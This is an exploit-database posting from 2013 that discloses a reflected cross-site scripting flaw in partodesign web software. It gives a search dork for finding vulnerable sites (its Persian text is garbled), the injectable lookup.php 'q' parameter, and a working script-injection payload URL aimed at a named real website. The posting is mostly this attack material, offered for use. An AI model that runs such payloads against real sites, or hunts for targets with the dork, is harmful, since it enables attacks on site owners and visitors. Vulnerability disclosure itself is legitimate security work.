partodesign Cross-Site Scripting Vulnerabilities

2013-07-17 16:38:09
Posted by: irist.ir

#################################

# Iranian Exploit DataBase

# http://exploit.iedb.ir

#################################

# Exploit Title : partodesign Cross-Site Scripting Vulnerabilities

# Author : Iranian Exploit DataBase

# Discovered By : IeDb

# Email : [email protected]

# Home : http://iedb.ir

# Software Link : http://www.partodesign.com/webdesign

# Security Risk : High

# Tested on : Linux

# Dork : intext:"Ø·Ø±Ø§ØÛ� Ø³Ø§Û�Øª Ù� Ø¨Ù�Û�Ù�Ù� Ø³Ø§Ø²Û� ØªÙ�Ø³Ø· Ø´Ø±Ú©Øª Ø·Ø±Ø§ØÛ� Ù¾Ø±ØªÙ�"

#################################

# Exploit :

# http://www.Site.com/lookup.php?q=[Xss]

# Dem0 :

# http://www.ssmt.ir/lookup.php?q="><script>alert(/IeDb.Ir/)</script>

#################################

Fixes

No fixes

In order to submit a new fix you need to be registered.